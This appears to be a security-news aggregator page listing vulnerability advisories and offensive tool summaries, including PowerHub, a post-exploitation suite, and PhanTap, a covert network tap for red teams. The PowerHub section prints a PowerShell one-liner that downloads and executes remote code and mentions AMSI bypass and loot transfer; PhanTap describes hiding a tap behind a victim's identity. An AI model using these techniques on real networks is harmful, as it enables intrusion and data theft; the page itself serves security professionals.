IT Security Tools
D-Link DIR-600M Wireless N 150 Home Router Access Bypass
A remote vulnerability was discovered on D-Link DIR-600M Wireless N 150 Home Router in multiple respective firmware versions. The vulnerability provides unauthenticated remote access to the router's WAN configuration page i.e. "wan.htm", which leads to disclosure of sensitive user information including but not limited to PPPoE, DNS configuration etc, also allowing to change the configuration settings as well. Metasploit module and NSE scripts are included.
Ubuntu Security Notice USN-4090-1
Ubuntu Security Notice 4090-1 - Tom Lane discovered that PostgreSQL did not properly restrict functions declared as "SECURITY DEFINER". An attacker could use this to execute arbitrary SQL with the permissions of the function owner. Andreas Seltenreich discovered that PostgreSQL did not properly handle user-defined hash equality operators. An attacker could use this to expose sensitive information. This issue only affected Ubuntu 19.04. Various other issues were also addressed.
Red Hat Security Advisory 2019-2425-01
Red Hat Security Advisory 2019-2425-01 - KVM is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm-rhev packages provide the user-space component for running virtual machines that use KVM in environments managed by Red Hat products. Issues addressed include buffer overflow and information leakage vulnerabilities.
Debian Security Advisory 4493-1
Debian Linux Security Advisory 4493-1 - Two security issues have been discovered in the PostgreSQL database system, which could result in privilege escalation, denial of service or memory disclosure.
Debian Security Advisory 4492-1
Debian Linux Security Advisory 4492-1 - A issue has been discovered in the PostgreSQL database system, which could result in privilege escalation.
Adive Framework 2.0.7 Cross Site Request Forgery
Adive Framework version 2.0.7 suffers from a cross site request forgery vulnerability.
Joomla JS Support Ticket 1.1.5 Arbitrary File Download
Joomla JS Support Ticket component version 1.1.5 suffers from an arbitrary file download vulnerability.
Joomla JS Support Ticket 1.1.5 SQL Injection
Joomla JS Support Ticket component version 1.1.5 suffers from a remote SQL injection vulnerability.
Baldr Botnet Panel Shell Upload
This Metasploit module exploits the file upload vulnerability of baldr malware panel in order to achieve arbitrary code execution.
Aptana Jaxer 184.108.40.20647 Local File Inclusion
Aptana Jaxer version 220.127.116.1147 suffers from a local file inclusion vulnerability.
Open-School 3.0 / Community Edition 2.3 Cross Site Scripting
Open-School version 3.0 and Community Edition 2.3 suffers from a cross site scripting vulnerability.
Linux show_numa_stats() Use-After-Free
Linux suffers from use-after-free read vulnerabilities in show_numa_stats().
Slackware Security Advisory - kdelibs Updates
Slackware Security Advisory - New kdelibs packages are available for Slackware 14.2 and -current to fix a security issue.
Red Hat Security Advisory 2019-2413-01
Red Hat Security Advisory 2019-2413-01 - This release of Red Hat Fuse 7.4.0 serves as a replacement for Red Hat Fuse 7.3, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Issues addressed include bypass, code execution, cross site request forgery, and deserialization vulnerabilities.
MapProxy 1.11.0 Cross Site Scripting
MapProxy version 1.11.0 suffers from a cross site scripting vulnerability.
Daily Expense Manager 1.0 Cross Site Request Forgery
Daily Expense Manager version 1.0 suffers from a cross site request forgery vulnerability.
Fortinet FortiRecorder 2.7.3 Hardcoded Password
Fortinet FortiRecorder versions 2.7.3 and below have a hardcoded password vulnerability.
iOS Messaging Tools
This repository contains several tools Project Zero uses to test iPhone messaging. It includes SmsSimulator: an SMS simulator for iPhone, iMessage: tools for sending and dumping iMessage messages, and imapiness: a fuzzer for IMAP clients. See the directory for each tool for further instructions and contact information. This is not an officially supported Google product. These tools were released and presented at BlackHat USA 2019.
Slurp - Blackbox/Whitebox S3 Bucket Enumerator
Slurp evaluates the security of S3 buckets.
- Credit to all the vendored packages that made developing Slurp possible.
- Slurp is for pen-testers and security professionals performing audits of S3 buckets.
- Scan via domain(s); you can target a single domain or a list of domains
- Scan via keyword(s); you can target a single keyword or a list of keywords
- Scan via AWS credentials; you can target your own AWS account to see which buckets have been exposed
- Colorized output for visual grep
- Currently generates over 28,000 permutations per domain and keyword (thanks to @jakewarren and @random-robbie)
- Punycode support for internationalized domains
- Strong copyleft license (GPLv3)
Modes
There are two modes in which this tool operates: blackbox and whitebox mode. Whitebox mode (or internal) is significantly faster than blackbox (external) mode.
Blackbox (external)
In this mode, you are using the permutations list to conduct scans. It will return false positives and there is no way to link the buckets to an actual AWS account! Do not open issues asking how to do this.
Whitebox (internal)
In this mode, you are using the AWS API with credentials on a specific account that you own to see what is open. This method pulls all S3 buckets and checks Policy/ACL permissions. Note that I will not provide support on how to use the AWS API.
Your credentials should be in ~/.aws/credentials.
- slurp domain <-t|--target> example.com will enumerate the S3 domains for a specific target.
- slurp keyword <-t|--target> linux,golang,python will enumerate S3 buckets based on those 3 key words.
- slurp internal performs an internal scan using the AWS API.
Installation
This project uses vgo; you can clone and go build, or download from the Releases section.
Please do not open issues on why you cannot build the project; this project builds like any other project would in Go. If you cannot build it, I strongly suggest you read the Go spec.
Also, the only binaries I'm including are linux/amd64; if you want mac/windows binaries, build them yourself.
PowerHub- A Post Exploitation Suite To Bypass Endpoint Protection
PowerHub is a convenient post exploitation tool which aids a pentester in transferring files, in particular code which may get flagged by endpoint protection.
During an engagement where you have a test client available, one of the first things you want to do is run PowerSploit. So you need to download the files, deal with endpoint protection, disable the execution policy, and so on.
PowerHub provides an (almost) one-click-solution for this. Oh, and you can also run arbitrary binaries (PE and shell code) entirely in-memory using PowerSploit's modules, which is sometimes useful to bypass application whitelisting.
Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back either as a file or a text snippet, via the command line or the web interface. PowerHub also helps with collaboration in case you're a small team.
On top of that, PowerHub comes with a reverse PowerShell, making it suitable for any kind of post-exploitation action.
Here is a simple example (grab information about local groups with PowerView and transfer it back):
PS C:\Users\avollmer> $K=new-object net.webclient;IEX $K.downloadstring('http://192.168.11.2:8000/0');
_____ _____ _ _ _ _______ ______ _ _ _ _ ______
|_____] | | | | | |______ |_____/ |_____| | | |_____]
| |_____| |__|__| |______ | \_ | | |_____| |_____]
written by Adrian Vollmer, 2018-2019
Run 'Help-PowerHub' for help
AmsiScanBuffer patch has been applied.
PS C:\Users\avollmer> lhm powerview
[*] /ps1/PowerSploit/Recon/PowerView.ps1 imported.
PS C:\Users\avollmer> Get-LocalGroup | pth -Name groups.json
Installation
PowerHub itself does not need to be installed. Just execute powerhub.py. However, there are a few dependencies. They are listed in requirements.txt. Install them either via pip3 install --user -r requirements.txt or use a virtual environment:
Run python3 -m venv env to create a virtual environment, then use source env/bin/activate to activate it. Now run pip3 install -r requirements.txt to install the dependencies inside the virtual environment.
Python2 is not supported.
Usage
PowerHub has one mandatory argument: the callback host (can be an IP address). You should also use --auth <user>:<pass>; otherwise, a randomly generated password will be used for basic authentication.
The switch --no-auth disables basic authentication, which is not recommended. The callback host name is used by the stager to download the payload. If the callback port or path differ from the default, they can also be changed.
Read ./powerhub.py --help and the Wiki for details.
Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap Aimed at Red Teams.
With limited physical access to a target building, this tap can be installed inline between a network device and the corporate network.
PhanTap is silent in the network and does not affect the victim’s traffic, even in networks having NAC (Network Access Control 802.1X - 2004). PhanTap will analyze traffic on the network and mask its traffic as the victim device.
It can mount a tunnel back to a remote server, giving the user a foothold in the network for further analysis and pivoting. PhanTap is an OpenWrt package and should be compatible with any device. The physical device used for our testing is currently a small, inexpensive router, the GL.iNet GL-AR150.
- Transparent network bridge.
- Silent : No ARP, multicast, broadcast.
- 802.1x passthrough.
- Automatic configuration:
  - SNAT bridge traffic to the victim MAC and IP address,
  - set the router default gateway to the MAC of the gateway detected just before.
- Introspects ARP, multicast and broadcast traffic, adds a route to each machine's IP address and adds the machine's MAC address to the neighbor list, which makes it possible to talk to all the machines in the local network.
- Learns the DNS server from traffic and modifies the one on the router so that it's the same.
- Can run commands (ex: /etc/init.d/openvpn restart) when a new IP or DNS is configured.
- Lets you choose any VPN software, for example OpenVPN tcp port 443 so it goes through most firewalls.
- You can talk to the victim machine (using the gateway IP).
Setup
PhanTap has been tested with the GL.iNet GL-AR150. This device has two separate network interfaces in OpenWrt (eth0, eth1).
If your device uses an internal switch (swconfig based) with interfaces like eth0.1, eth0.2, some special traffic might be blocked, e.g. 802.1Q (tagged VLAN), but PhanTap should still work.
- Install a snapshot build for the GL.iNet GL-AR150
- Update the OpenWrt package list
- Install the PhanTap package:
- Configure the Wi-Fi and start administering the router through it.
- Either reboot the device, or run /etc/init.d/phantap setup.
- Get the interface names from that device:
In this example we are using a GL-AR150, which only has 2 interfaces.
Add the interfaces to the phantap bridge via the following commands in the CLI (assuming we are using a GL-AR150):
- uci delete network.lan.ifname
- uci delete network.wan.ifname
- uci delete network.wan6.ifname
- uci set network.phantap.ifname='eth0 eth1'
- uci commit network
- /etc/init.d/network reload
PhanTap is now configured; as soon as you plug it between a victim and their switch, it will automatically configure the router and give it Internet access.
You can add your favorite VPN to have a remote connection back. PhanTap has been tested with a VPN on TCP port 443 to avoid some detection methods.
You can also add a command to be run when a new IP or DNS is configured, in /etc/config/phantap, e.g. /etc/init.d/openvpn restart (restart the VPN service).
You can also look at disabling the Wi-Fi by default and using hardware buttons to start it (https://openwrt.org/docs/guide-user/hardware/hardware.button).
Limitations, or how it can be detected:
- The GL.iNet GL-AR150 and most inexpensive devices only support 100 Mbps, while modern network traffic runs at 1 Gbps.
- The network port will stay up on the switch side when the victim device is disconnected or shut down.
- There is no re-configuration of PhanTap, so it might keep using an IP that has been reassigned to another device (roadmap: DHCP).
- Some traffic is blocked by the Linux bridge (STP/Pause frames/LACP).
- Add logic to restart the detection when the links go up/down.
- Add DHCP packet analysis for dynamic reconfiguration.
- Add IPv6 support.
- Test limitations of devices that have switches (swconfig) instead of separate interfaces.
Scapy Packet Manipulation Tool 2.4.3
Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more. Interaction is provided by the Python interpreter, so Python programming structures can be used (such as variables, loops, and functions). Report modules are possible and easy to make. It is intended to do the same things as ttlscan, nmap, hping, queso, p0f, xprobe, arping, arp-sk, arpspoof, firewalk, irpas, tethereal, tcpdump, etc.
Opencart 18.104.22.168 Insecure OCMod Generation Pre-Authentication Remote Code Execution
Opencart versions 22.214.171.124 and below insecure OCMod generation pre-authentication remote code execution exploit.
Ubuntu Security Notice USN-4089-1
Ubuntu Security Notice 4089-1 - It was discovered that Rack incorrectly handled carefully crafted requests. A remote attacker could use this issue to execute a cross-site scripting attack.
Red Hat Security Advisory 2019-2411-01
Red Hat Security Advisory 2019-2411-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system.
Ubuntu Security Notice USN-4088-1
Ubuntu Security Notice 4088-1 - It was discovered that PHP incorrectly handled certain regular expressions. An attacker could possibly use this issue to expose sensitive information, cause a denial of service or execute arbitrary code.
Red Hat Security Advisory 2019-2405-01
Red Hat Security Advisory 2019-2405-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Red Hat Security Advisory 2019-2399-01
Red Hat Security Advisory 2019-2399-01 - The libssh2 packages provide a library that implements the SSH2 protocol. Issues addressed include an out of bounds write vulnerability.
Red Hat Security Advisory 2019-2403-01
Red Hat Security Advisory 2019-2403-01 - Augeas is a configuration editing tool. It parses configuration files in their native formats and transforms them into a tree. Configuration changes are made by manipulating this tree and saving it back into native config files. A memory corruption vulnerability was addressed.
Red Hat Security Advisory 2019-2401-01
Red Hat Security Advisory 2019-2401-01 - The procps-ng packages contain a set of system utilities that provide system information, including ps, free, skill, pkill, pgrep, snice, tload, top, uptime, vmstat, w, watch, and pwdx. Issues addressed include a heap overflow vulnerability.
Red Hat Security Advisory 2019-2402-01
Red Hat Security Advisory 2019-2402-01 - The systemd packages contain systemd, a system and service manager for Linux, compatible with the SysV and LSB init scripts. It provides aggressive parallelism capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, and keeps track of processes using Linux cgroups. Stack overflow vulnerabilities have been addressed.
Red Hat Security Advisory 2019-2400-01
Red Hat Security Advisory 2019-2400-01 - Perl is a high-level programming language that is commonly used for system administration utilities and web programming. Issues addressed include a buffer overflow vulnerability.
Red Hat Security Advisory 2019-2002-01
Red Hat Security Advisory 2019-2002-01 - Redis is an advanced key-value store. It is often referred to as a data-structure server since keys can contain strings, hashes, lists, sets, and sorted sets. For performance, Redis works with an in-memory data set. You can persist it either by dumping the data set to disk every once in a while, or by appending each command to a log. Issues addressed include a buffer overflow vulnerability.
WordPress JoomSport 3.3 SQL Injection
WordPress JoomSport plugin version 3.3 suffers from a remote SQL injection vulnerability.
Mandos Encrypted File System Unattended Reboot Utility 1.8.7
The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system.